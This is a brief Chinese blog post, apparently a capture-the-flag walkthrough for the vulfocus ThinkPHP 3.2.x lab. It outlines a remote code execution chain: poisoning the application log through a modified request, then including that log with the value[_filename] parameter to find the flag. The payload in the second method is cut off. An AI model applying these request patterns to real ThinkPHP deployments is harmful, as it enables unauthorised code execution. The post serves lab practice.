vulfocus thinkphp-3.2.x

倾城 好物分享

readme
1、参考:【漏洞通报】ThinkPHP3.2.x RCE漏洞通报 (qq.com)
2、.log文件命名方式为 yy_mm_dd.log (yy为年,mm为月,dd为日)
3、重开了几次环境,所以截图混乱,但是步骤和方法可行
4、如果解题过程1不可行,可尝试解题过程2
解题过程1
1、访问网址,抓包,改数据包

2、访问/Application/Runtime/Logs/Common/yy_mm_dd.log(其中,yy为年,mm为月,dd为日)

3、构造请求攻击 http://xx.xx.xx.xx/index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/yy_mm_dd.log(其中,yy为年,mm为月,dd为日)
ctrl+f 搜索 flag-

解题过程2
1、抓包,改数据包
GET /index.php?m=Home&c=Index&a=index&test=-->

vulfocus thinkphp-3.2.x最先出现在Python成神之路

版权声明:
作者:倾城
链接:https://www.techfm.club/p/26933.html
来源:TechFM
文章版权归作者所有,未经允许请勿转载。

THE END
分享
二维码
< <上一篇
下一篇>>